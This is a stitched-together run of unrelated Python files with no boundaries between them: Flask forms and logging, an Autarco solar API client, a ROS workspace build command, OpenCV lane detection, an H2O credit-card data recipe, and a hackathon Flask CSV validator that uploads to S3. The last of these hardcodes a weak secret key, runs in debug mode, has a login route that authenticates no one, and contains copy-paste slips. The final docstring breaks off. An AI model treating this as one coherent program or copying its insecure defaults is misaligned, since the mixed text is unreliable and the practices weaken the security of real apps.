rotatingfile_handler.setFormatter(file_formatter) application.logger.addHandler(console_handler) application.logger.addHandler(rotatingfile_handler) application.logger.setLevel(log_level) if __name__ == '__main__': 
application.run(host="0.0.0.0", port=5001) from flask_wtf import FlaskForm from wtforms import StringField, PasswordField, BooleanField, SubmitField from wtforms.validators import Required, Email, EqualTo, Length from models.user import User from wtforms import ValidationError class LoginForm(FlaskForm): ''' Class to create a login form ''' email = StringField('Email address', validators=[Required(),Email()]) password = PasswordField('Password', validators=[Required()]) remember = BooleanField('Remember me') submit = SubmitField('Sign in') class RegistrationForm(FlaskForm): ''' Class to create a registration form ,render_kw={'class':'btn-submit'} ''' first_name = StringField("First name", validators=[Required()]) other_names = StringField("Other names", validators=[Required()]) username = StringField("Enter your username", validators=[Required()]) email = StringField("Your Email Address", validators=[Required(), Email()]) password = PasswordField("Password", validators=[Required(),Length(min=8, max=80), EqualTo( 'password_confirm', message="Passwords must match")]) password_confirm = PasswordField( "", validators=[Required()]) submit = SubmitField('Sign Up') def validate_email(self, data_field): ''' Method to confirm if there is no user registered with that email address Args: data_field: email Return: validation error if user exists ''' if User.query.filter_by(email=data_field.data).first(): raise ValidationError('Email exists!') def validate_username(self, data_field): ''' Method to confirm if username is unique and raise validation error if another user has the same username Args: data_field:username Return: validation error if user exists ''' if User.query.filter_by(username=data_field.data).first(): raise ValidationError('That username is taken!') klaasnicolaas/python-autarco """Asynchronous Python client for Autarco API.""" from __future__ import annotations import asyncio import socket from dataclasses import dataclass from importlib import metadata from typing import Any import aiohttp import async_timeout from aiohttp.client import ClientError, ClientResponseError, ClientSession from aiohttp.hdrs import METH_GET from yarl import URL from .exceptions import ( AutarcoAuthenticationError, AutarcoConnectionError, AutarcoConnectionTimeoutError, AutarcoError, ) from .models import Account, Inverter, Solar @dataclass class Autarco: """Main class for handling connections to Autarco.""" email: str password: str request_timeout: float = 10.0 session: ClientSession | None = None _close_session: bool = False async def _request( self, uri: str, *, method: str = METH_GET, data: dict[str, Any] | None = None, ) -> Any: """Handle a request to the Autarco API. A generic method for sending/handling HTTP requests done against the Autarco API. Args: uri: Request URI, without '/', for example, 'status'. method: HTTP method to use. data: Dictionary of data send to the Autarco API. Returns: The response data from the Autarco API. Raises: AutarcoAuthenticationError: If the email or password is invalid. AutarcoConnectionError: An error occurred while communicating with the Autarco API. AutarcoConnectionTimeoutError: A timeout occurred while communicating with the Autarco API. AutarcoError: Received an unexpected response from the Autarco API. 
""" version = metadata.version(__package__) url = URL.build(scheme="https", host="my.autarco.com", path="/api/site/").join( URL(uri) ) headers = { "Accept": "application/json", "User-Agent": f"PythonAutarco/{version}", } if self.session is None: self.session = ClientSession() self._close_session = True # Set basic auth credentials. auth = aiohttp.BasicAuth(self.email, self.password) try: async with async_timeout.timeout(self.request_timeout): response = await self.session.request( method, url, auth=auth, headers=headers, json=data, ssl=True, ) response.raise_for_status() except asyncio.TimeoutError as exception: raise AutarcoConnectionTimeoutError( "Timeout occurred while connecting to Autarco API" ) from exception except ClientResponseError as exception: if exception.status == 401: raise AutarcoAuthenticationError( "Authentication to the Autarco API failed" ) from exception raise AutarcoConnectionError( "Error occurred while connecting to the Autarco API" ) from exception except (ClientError, socket.gaierror) as exception: raise AutarcoConnectionError( "Error occurred while communicating with the Autarco API" ) from exception content_type = response.headers.get("Content-Type", "") if "application/json" not in content_type: text = await response.text() raise AutarcoError( "Unexpected response from the Autarco API", {"Content-Type": content_type, "response": text}, ) response_data: dict[str, Any] = await response.json(content_type=None) return response_data async def get_public_key(self) -> str: """Get the public key. Returns: The public key as string. """ data = await self._request("") key: str = data[0]["public_key"] return key async def all_inverters(self, public_key: str) -> dict[str, Inverter]: """Get a list of all used inverters. Args: public_key: The public key from your account. Returns: A list of Inverter objects. """ results: dict[str, Any] = {} data = await self._request(f"{public_key}/power") for number, item in enumerate(data["inverters"].items(), 1): inverter = Inverter.from_json(item) results[f"Inverter {number}"] = inverter return results async def solar(self, public_key: str) -> Solar: """Get information about the solar production. Args: public_key: The public key from your account. Returns: An Solar object. """ data = await self._request(f"{public_key}/") return Solar.from_json(data) async def account(self, public_key: str) -> Account: """Get information about your account. Args: public_key: The public key from your account. Returns: An Account object. """ data = await self._request(f"{public_key}/") return Account.from_json(data) async def close(self) -> None: """Close open client session.""" if self.session and self._close_session: await self.session.close() async def __aenter__(self) -> Autarco: """Async enter. Returns: The Autarco object. """ return self async def __aexit__(self, *_exc_info: Any) -> None: """Async exit. Args: _exc_info: Exec type. """ await self.close() 1-10 # coding=utf-8 # # ROSREPO # Manage ROS workspaces with multiple Gitlab repositories # # Author: # # Copyright 2016 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
# See the License for the specific language governing permissions and # limitations under the License. # # import os from .workspace import find_ros_root, get_workspace_location, get_workspace_state, resolve_this, WSFL_WS_PACKAGES from .cmd_git import clone_packages from .resolver import find_dependees, resolve_system_depends from .config import Config from .cache import Cache from .ui import msg, warning, error, fatal, show_conflicts, show_missing_system_depends from .util import call_process, find_program, iteritems, getmtime, PIPE, env_path_list_contains, \ run_multiprocess_workers from functools import reduce def run(args): wsdir = get_workspace_location(args.workspace) config = Config(wsdir) cache = Cache(wsdir) if args.offline is None: args.offline = config.get("offline_mode", False) if args.offline: warning("offline mode. Run 'rosrepo config --online' to disable\n") ros_rootdir = find_ros_root(config.get("ros_root", None)) if ros_rootdir is None: fatal("cannot detect ROS distribution. Have you sourced your setup.bash?\n") config.set_default("default_build", []) config.set_default("pinned_build", []) config.set_default("last_build", []) config.set_default("last_ros_root", ros_rootdir) if config["last_ros_root"] != ros_rootdir and not args.clean_all: msg( "You have changed your ROS distribution from " "@{cf}%(old_path)s@| to @{cf}%(new_path)s@|. Please run\n\n" " @!rosrepo clean@|\n\n" "to remove all obsolete build artifacts and rebuild your workspace with " "the new ROS version.\n\n" % {"old_path": config["last_ros_root"], "new_path": ros_rootdir} ) fatal("need to clean workspace") ws_state = get_workspace_state(wsdir, config, cache, offline_mode=args.offline) if args.last: args.packages = config["last_build"] if args.this: args.packages = resolve_this(wsdir, ws_state) if args.all: args.packages = ws_state.ws_packages.keys() if args.rebuild: args.packages = [pkg for pkg in ws_state.ws_packages.keys() if os.path.isfile(os.path.join(wsdir, "build", pkg, "Makefile"))] if args.set_default: if args.packages: msg("@{cf}Replacing default build set with@|:\n") msg(", ".join(sorted(args.packages)) + "\n\n", indent=4) else: fatal("no packages given for new default build\n") config["default_build"] = sorted(args.packages) if args.set_pinned: if args.packages: msg("@{cf}Replacing pinned build set with@|:\n") msg(", ".join(sorted(args.packages)) + "\n\n", indent=4) else: fatal("no packages given to be pinned\n") config["pinned_build"] = sorted(args.packages) srcdir = os.path.join(wsdir, "src") pinned_set = set(config["pinned_build"]) if args.packages: build_set = set(args.packages) if build_set: msg("@{cf}You selected the following packages to be built@|:\n") msg(", ".join(sorted(list(build_set))) + "\n\n", indent=4) else: build_set = set(config["default_build"]) if build_set: msg("@{cf}The following packages are included in the default build@|:\n") msg(", ".join(sorted(list(build_set))) + "\n\n", indent=4) if pinned_set - build_set: if build_set: msg("@{cf}The following pinned packages will also be built@|:\n") else: msg("@{cf}The following pinned packages will be built@|:\n") msg(", ".join(sorted(list(pinned_set - build_set))) + "\n\n", indent=4) config["last_build"] = list(build_set) clean_set = build_set.copy() build_set |= pinned_set if not build_set: fatal("no packages to build\n") build_packages, system_depends, conflicts = find_dependees(build_set, ws_state) show_conflicts(conflicts) if conflicts: fatal("cannot resolve dependencies\n") clean_packages, _, _ = find_dependees(clean_set, 
ws_state, auto_resolve=True, ignore_missing=True) clean_packages = set(clean_packages.keys()) & set(ws_state.ws_packages.keys()) if not args.dry_run: config.write() depend_set = set(build_packages.keys()) - build_set if depend_set: msg("@{cf}The following additional packages are needed to satisfy dependencies@|:\n") msg(", ".join(sorted(depend_set)) + "\n\n", indent=4) if system_depends: msg("@{cf}The following system packages are needed to satisfy dependencies@|:\n") msg(", ".join(sorted(system_depends)) + "\n\n", indent=4) missing = resolve_system_depends(ws_state, system_depends, missing_only=True) show_missing_system_depends(missing) if missing and not args.ignore_missing_depends: fatal("missing system packages (use -m/--ignore-missing-depends) to build anyway)\n") if args.clone: clone_packages(srcdir, build_packages, ws_state, config, protocol=args.protocol or config.get("git_default_transport", "ssh"), offline_mode=args.offline, dry_run=args.dry_run) ws_state = get_workspace_state(wsdir, config, cache, offline_mode=args.offline, ws_state=ws_state, flags=WSFL_WS_PACKAGES) build_packages, _, conflicts = find_dependees(build_set, ws_state) show_conflicts(conflicts) assert not conflicts missing_ws = [n for n in build_packages if n not in ws_state.ws_packages] if missing_ws and not args.dry_run: msg("@{cf}The following packages are missing from your workspace@|:\n") msg(", ".join(sorted(missing_ws)) + "\n\n", indent=4) fatal("missing build dependencies\n") if config["last_ros_root"] != ros_rootdir and not args.dry_run: invoke = ["catkin", "config", "--extend", ros_rootdir] call_process(invoke, stdout=PIPE, stderr=PIPE) config["last_ros_root"] = ros_rootdir config.write() if args.clean_all: invoke = ["catkin", "clean", "--workspace", wsdir, "--yes", "--all"] if args.dry_run: invoke += ["--dry-run"] call_process(invoke) elif args.clean: invoke = ["catkin", "clean", "--workspace", wsdir, "--yes"] if args.dry_run: invoke += ["--dry-run"] invoke += list(clean_packages) call_process(invoke) catkin_lint = find_program("catkin_lint") if args.catkin_lint is None: args.catkin_lint = config.get("use_catkin_lint", True) if catkin_lint and args.catkin_lint: skip_catkin_lint = set(config.get("skip_catkin_lint", [])) & set(build_packages.keys()) catkin_lint = [catkin_lint, "--package-path", srcdir] if args.offline: catkin_lint += ["--offline"] catkin_lint += reduce(lambda x, y: x + y, (["--pkg", pkg] for pkg in build_packages.keys())) if skip_catkin_lint: catkin_lint += reduce(lambda x, y: x + y, (["--skip", pkg] for pkg in skip_catkin_lint)) msg("@{cf}Running catkin_lint@|\n") ret = call_process(catkin_lint) for pkg in skip_catkin_lint: warning("skipped catkin_lint for package '%s'\n" % pkg) if ret != 0 and not args.dry_run: fatal("catkin_lint reported errors\n") catkin_build = ["catkin", "build", "--workspace", wsdir] if args.dry_run: catkin_build += ["--dry-run"] if args.verbose: catkin_build += ["--verbose"] if args.no_status: catkin_build += ["--no-status"] if args.keep_going: catkin_build += ["--continue-on-failure"] if args.env_cache is None: args.env_cache = config.get("use_env_cache", True) if args.env_cache: catkin_build += ["--env-cache"] else: catkin_build += ["--no-env-cache"] if args.jobs: jobs = int(args.jobs) if jobs > 0: catkin_build += ["-j", str(args.jobs), "-p", str(args.jobs)] else: jobs = None elif "job_limit" in config: jobs = int(config["job_limit"]) catkin_build += ["-j", str(config["job_limit"]), "-p", str(config["job_limit"])] else: jobs = None catkin_build += 
build_packages.keys() if args.verbose: catkin_build += ["--make-args", "VERBOSE=ON"] ret = call_process(catkin_build) rosclipse = find_program("rosclipse") use_rosclipse = args.rosclipse or (args.rosclipse is None and config.get("use_rosclipse", True)) force_rosclipse = args.rosclipse if rosclipse is not None and use_rosclipse: eclipse_ok, _, _ = call_process([rosclipse, "-d"], stdout=PIPE, stderr=PIPE) if eclipse_ok == 0: workload = [] for name, pkg in iteritems(build_packages): if not pkg.manifest.is_metapackage() and hasattr(pkg, "workspace_path") and pkg.workspace_path is not None: pkgdir = os.path.join(wsdir, "src", pkg.workspace_path) p_time = max(getmtime(os.path.join(pkgdir, "CMakeLists.txt")), getmtime(os.path.join(pkgdir, "package.xml"))) e_time = getmtime(os.path.join(pkgdir, ".project")) if e_time < p_time or force_rosclipse: workload.append((wsdir, rosclipse, name, args.dry_run)) run_multiprocess_workers(update_rosclipse, workload, jobs=jobs) if os.path.isdir(os.path.join(wsdir, "devel", "bin")) and not env_path_list_contains("PATH", os.path.join(wsdir, "devel", "bin")): warning("%s is not in PATH\n" % os.path.join(wsdir, "devel", "bin")) msg("You probably need to source @{cf}%s@| again (or close and re-open your terminal)\n\n" % os.path.join(wsdir, "devel", "setup.bash")) if not env_path_list_contains("ROS_PACKAGE_PATH", os.path.join(wsdir, "src")): for name, pkg in iteritems(build_packages): if not pkg.manifest.is_metapackage() and hasattr(pkg, "workspace_path") and pkg.workspace_path is not None: pkgdir = os.path.join(wsdir, "src", pkg.workspace_path) if not env_path_list_contains("ROS_PACKAGE_PATH", pkgdir): warning("%s is not in ROS_PACKAGE_PATH\n" % pkgdir) msg("You probably need to source @{cf}%s@| again (or close and re-open your terminal)\n\n" % os.path.join(wsdir, "devel", "setup.bash")) return ret def update_rosclipse(part): wsdir, rosclipse, name, dry_run = part[0], part[1], part[2], part[3] msg("@{cf}Updating rosclipse project files@|: %s\n" % name) if not dry_run: result, catkin_env, _ = call_process(["catkin", "build", "--workspace", wsdir, "--get-env", name], stdout=PIPE) if result != 0: error("%s: failed to setup environment\n" % name) return result, _, _ = call_process(["catkin", "env", "-i", "--stdin", rosclipse, name], input_data=catkin_env, stdin=PIPE) if result != 0: error("%s: failed to update rosclipse project files\n" % name) import cv2 import numpy as np def draw_the_lines(image, lines): lines_image = np.zeros(shape=(image.shape[0], image.shape[1], 3), dtype=np.uint8) for line in lines: for x1, y1, x2, y2 in line: cv2.line(lines_image, (x1, y1), (x2, y2), (255,0,0), thickness=3) image_with_lines = cv2.addWeighted(image, 0.8, lines_image, 1, 0.0) return image_with_lines def region_of_interest(image, region_points): mask = np.zeros_like(image) cv2.fillPoly(mask, region_points, 255) masked_image = cv2.bitwise_and(image, mask) return masked_image def get_detect_lanes(image, filter='laplacian'): height, width, _ = image.shape grayscale_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) if filter.lower() == 'laplacian': edge_kernel = np.array([ [0, 1, 0], [1, -4, 1], [0 ,1, 0] ]) result_image = cv2.filter2D(grayscale_image, -1, edge_kernel) elif filter.lower() == 'canny': result_image = cv2.Canny(grayscale_image, 70, 100) region_of_interest_verties = [ [0, height], [width/2, height*0.6], [width, height] ] cropped_image = region_of_interest(result_image, np.array([region_of_interest_verties], np.int32)) lines = cv2.HoughLinesP(cropped_image, rho=2, theta=np.pi/ 
180, threshold=50, lines=np.array([]), minLineLength=40, maxLineGap=150) image_with_lines = draw_the_lines(image, lines) return image_with_lines video = cv2.VideoCapture('videos/lane_detection_video.mp4') while video.isOpened(): is_grabbed, frame = video.read() if not is_grabbed: break frame = get_detect_lanes(frame, 'canny') cv2.imshow("Lane Detection Video", frame) cv2.waitKey(20) video.release() cv2.destroyAllWindows()h2oai/driverlessai-recipes """Modify credit card dataset""" from typing import Union, List from h2oaicore.data import CustomData import datatable as dt import numpy as np import pandas as pd class CreditCardData(CustomData): @staticmethod def create_data(X: dt.Frame = None) -> Union[str, List[str], dt.Frame, List[dt.Frame], np.ndarray, List[np.ndarray], pd.DataFrame, List[pd.DataFrame]]: if X is None: return [] if 'default payment next month' in X.names: # e.g. train data X[:, 'default payment next month leak'] = X[:, 'default payment next month'] else: # e.g. test data without target, for testing purposes, ensure still CC dataset cc_names = ["AGE", "ID", "LIMIT_BAL", "SEX", "EDUCATION", "MARRIAGE", "PAY_0", "PAY_2", "PAY_3", "PAY_4", "PAY_5", "PAY_6", "BILL_AMT1", "BILL_AMT2", "BILL_AMT3", "BILL_AMT4", "BILL_AMT5", "BILL_AMT6", "PAY_AMT1", "PAY_AMT2", "PAY_AMT3", "PAY_AMT4", "PAY_AMT5", "PAY_AMT6"] assert all([x in cc_names for x in X.names]) return X 0 ''' from flask import Flask, render_template, request, flash import json app = Flask(name) @app.route('/') def home(): return render_template("index.html") @app.route('/login_1', methods=['GET', 'POST']) def login_func(): if request.method == 'POST': return redirect(url_for('index')) return render_template('login_1.html') if name == "main": app.run(debug=True) ''' from flask import Flask, render_template, request, flash, redirect, url_for import json import pandas as pd from io import StringIO from pandas_schema import Column, Schema from pandas_schema.validation import LeadingWhitespaceValidation, TrailingWhitespaceValidation, CanConvertValidation, MatchesPatternValidation, InRangeValidation, InListValidation, DateFormatValidation import os from werkzeug.utils import secure_filename import os import boto3 app = Flask(__name__) app.secret_key = "secret key" @app.route('/') def home(): return render_template("index.html") @app.route('/login', methods=['GET', 'POST']) def login_func(): if request.method == 'POST': return redirect(url_for('index')) return render_template('login.html') @app.route('/upload', methods=['GET', 'POST']) def upload_func(): if request.method == 'POST': return redirect(url_for('upload')) return render_template('upload.html') s3 = boto3.client('s3', aws_access_key_id = "", aws_secret_access_key = "" ) BUCKET_NAME='dell-hackathon' @app.route('/upload_aws',methods=['post']) def upload(): if request.method == 'POST': img = request.files['file'] if img: filename = secure_filename(img.filename) img.save(filename) s3.upload_file( Bucket = BUCKET_NAME, Filename=filename, Key = filename ) return render_template("upload.html") @app.route('/design', methods=['post', 'get']) def design(): if request.method == 'POST': values=0 if request.form.get('columns') == '1': a=request.form.get('columns') values=1 print(a) return render_template("design.html",value=a,values=values) count=1 if request.form.get('columns') == '2': a=request.form.get('columns') values=2 print(a) return render_template("design.html",value=a,values=values) if request.form.get('columns') == '3': a=request.form.get('columns') values=3 print(a) 
return render_template("design.html",value=a,values=values) if request.form.get('columns') == '4': a=request.form.get('columns') values=4 print(a) return render_template("design.html",value=a,values=values) if request.form.get('columns') == '5': a=request.form.get('columns') values=5 print(a) return render_template("design.html",value=a,values=values) #value = None cnum0 = request.form.get('cnum0') cnum1 = request.form.get('cnum1') cnum2 = request.form.get('cnum2') cnum3 = request.form.get('cnum3') cnum4 = request.form.get('cnum4') d0 = request.form.get('d0') d1 = request.form.get('d1') d2 = request.form.get('d2') d3 = request.form.get('d3') d4 = request.form.get('d4') c0="" c1="" c2="" c3="" c4="" if int(cnum1 or 123) is None: cnum1="" if int(cnum2 or 23) is None: cnum2="" if int(cnum3 or 23) is None: cnum3="" if int(cnum4 or 23) is None: cnum4="" if cnum4=='4': test_data = pd.read_csv('data-5.csv') if d0=='Age': c0=InRangeValidation(0, 110) if d0=='Name': c0=LeadingWhitespaceValidation() if d0=='Gender': c0=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d0=='Phn': c0=MatchesPatternValidation(r'\d{10}') if d0=='E-mail': c0=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d0=='Date': c0=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d0=='Time': c0=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") if d1=='Age': c1=InRangeValidation(0, 110) if d1=='Name': c1=LeadingWhitespaceValidation() if d1=='Gender': c1=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d1=='Phn': c1=MatchesPatternValidation(r'\d{10}') if d1=='E-mail': c1=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d1=='Date': c1=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d1=='Time': c1=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") if d2=='Age': c2=InRangeValidation(0, 110) if d2=='Name': c2=LeadingWhitespaceValidation() if d2=='Gender': c2=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d2=='Phn': c2=MatchesPatternValidation(r'\d{10}') if d2=='E-mail': c2=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d2=='Date': c2=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d2=='Time': c2=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") if d3=='Age': c3=InRangeValidation(0, 110) if d3=='Name': c3=LeadingWhitespaceValidation() if d3=='Gender': c3=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d3=='Phn': c3=MatchesPatternValidation(r'\d{10}') if d3=='E-mail': c3=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d3=='Date': c3=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d3=='Time': c3=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") if d4=='Age': c4=InRangeValidation(0, 110) if d4=='Name': c4=LeadingWhitespaceValidation() if d4=='Gender': c4=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d4=='Phn': c4=MatchesPatternValidation(r'\d{10}') if d4=='E-mail': c4=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d4=='Date': c4=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d4=='Time': c4=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") list=[] for col in test_data.columns: list.append(col) schema = Schema([Column(list[int(cnum0)], [c0]),Column(list[int(cnum1)], [c1]),Column(list[int(cnum2)], [c2]), 
Column(list[int(cnum3)], [c3]), Column(list[int(cnum4)], [c4]) ]) errors = schema.validate(test_data) for error in errors: print(error) pd.DataFrame({'col':errors}).to_csv('errors.csv') return redirect(url_for('design')) if cnum3=='3': test_data = pd.read_csv('data-4.csv') if d0=='Age': c0=InRangeValidation(0, 110) if d0=='Name': c0=LeadingWhitespaceValidation() if d0=='Gender': c0=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d0=='Phn': c0=MatchesPatternValidation(r'\d{10}') if d0=='E-mail': c0=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d0=='Date': c0=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d0=='Time': c0=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") if d1=='Age': c1=InRangeValidation(0, 110) if d1=='Name': c1=LeadingWhitespaceValidation() if d1=='Gender': c1=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d1=='Phn': c1=MatchesPatternValidation(r'\d{10}') if d1=='E-mail': c1=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d1=='Date': c1=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d1=='Time': c1=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") if d2=='Age': c2=InRangeValidation(0, 110) if d2=='Name': c2=LeadingWhitespaceValidation() if d2=='Gender': c2=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d2=='Phn': c2=MatchesPatternValidation(r'\d{10}') if d2=='E-mail': c2=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d2=='Date': c2=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d2=='Time': c2=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") if d3=='Age': c3=InRangeValidation(0, 110) if d3=='Name': c3=LeadingWhitespaceValidation() if d3=='Gender': c3=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d3=='Phn': c3=MatchesPatternValidation(r'\d{10}') if d3=='E-mail': c3=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d3=='Date': c3=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d3=='Time': c3=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") list=[] for col in test_data.columns: list.append(col) schema = Schema([Column(list[int(cnum0)], [c0]),Column(list[int(cnum1)], [c1]),Column(list[int(cnum2)], [c2]), Column(list[int(cnum3)], [c3]) ]) errors = schema.validate(test_data) for error in errors: print(error) pd.DataFrame({'col':errors}).to_csv('errors.csv') return redirect(url_for('design')) if cnum2=='2': test_data = pd.read_csv('data-3.csv') if d0=='Age': c0=InRangeValidation(0, 110) if d0=='Name': c0=LeadingWhitespaceValidation() if d0=='Gender': c0=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d0=='Phn': c0=MatchesPatternValidation(r'\d{10}') if d0=='E-mail': c0=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d0=='Date': c0=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d0=='Time': c0=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") if d1=='Age': c1=InRangeValidation(0, 110) if d1=='Name': c1=LeadingWhitespaceValidation() if d1=='Gender': c1=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d1=='Phn': c1=MatchesPatternValidation(r'\d{10}') if d1=='E-mail': c1=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d1=='Date': 
c1=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d1=='Time': c1=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") if d2=='Age': c2=InRangeValidation(0, 110) if d2=='Name': c2=LeadingWhitespaceValidation() if d2=='Gender': c2=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d2=='Phn': c2=MatchesPatternValidation(r'\d{10}') if d2=='E-mail': c4=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d2=='Date': c2=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d2=='Time': c2=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") list=[] for col in test_data.columns: list.append(col) schema = Schema([Column(list[int(cnum0)], [c0]),Column(list[int(cnum1)], [c1]),Column(list[int(cnum2)], [c2]) ]) errors = schema.validate(test_data) for error in errors: print(error) pd.DataFrame({'col':errors}).to_csv('errors.csv') return redirect(url_for('design')) elif cnum1=='1': test_data = pd.read_csv('data-2.csv') if d0=='Age': c0=InRangeValidation(0, 110) if d0=='Name': c0=LeadingWhitespaceValidation() if d0=='Gender': c0=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d0=='Phn': c0=MatchesPatternValidation(r'\d{10}') if d0=='E-mail': c0=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d0=='Date': c0=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d0=='Time': c0=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") if d1=='Age': c1=InRangeValidation(0, 110) if d1=='Name': c1=LeadingWhitespaceValidation() if d1=='Gender': c1=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d1=='Phn': c1=MatchesPatternValidation(r'\d{10}') if d1=='E-mail': c1=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d1=='Date': c1=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d1=='Time': c1=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") list=[] for col in test_data.columns: list.append(col) schema = Schema([Column(list[int(cnum0)], [c0]),Column(list[int(cnum1)], [c1]) ]) errors = schema.validate(test_data) for error in errors: print(error) pd.DataFrame({'col':errors}).to_csv('errors.csv') return redirect(url_for('design')) else: test_data = pd.read_csv('data-1.csv') if d0=='Age': c0=InRangeValidation(0, 110) if d0=='Name': c0=LeadingWhitespaceValidation() if d0=='Gender': c0=InListValidation(['Male', 'Female', 'Other', 'm','M','f','F','male','female','other']) if d0=='Phn': c0=MatchesPatternValidation(r'\d{10}') if d0=='E-mail': c0=MatchesPatternValidation(r'(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+$)') if d0=='Date': c0=MatchesPatternValidation(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}") if d0=='Time': c0=MatchesPatternValidation(r"[\d]{1,2}:[\d]{2}") list=[] for col in test_data.columns: list.append(col) schema = Schema([Column(list[int(cnum0)], [c0])]) errors = schema.validate(test_data) for error in errors: print(error) pd.DataFrame({'col':errors}).to_csv('errors.csv') return redirect(url_for('design')) return redirect(url_for('design')) elif request.method == 'GET': # return render_template("index.html") print("No Post Back Call") return render_template("design.html") if __name__ == "__main__": app.run(debug=True)"""An example use case is ```python import time import panel as pn from awesome_panel_extensions.widgets.progress_ext import ProgressExt progress = ProgressExt() run_button = pn.widgets.Button(name="Click me") @progress.increment(50, "incrementing ...") def run(event): 
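        # Simulated work; as the note after this example says, each click
        # advances the bar by 50, so the progress view resets every second click.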
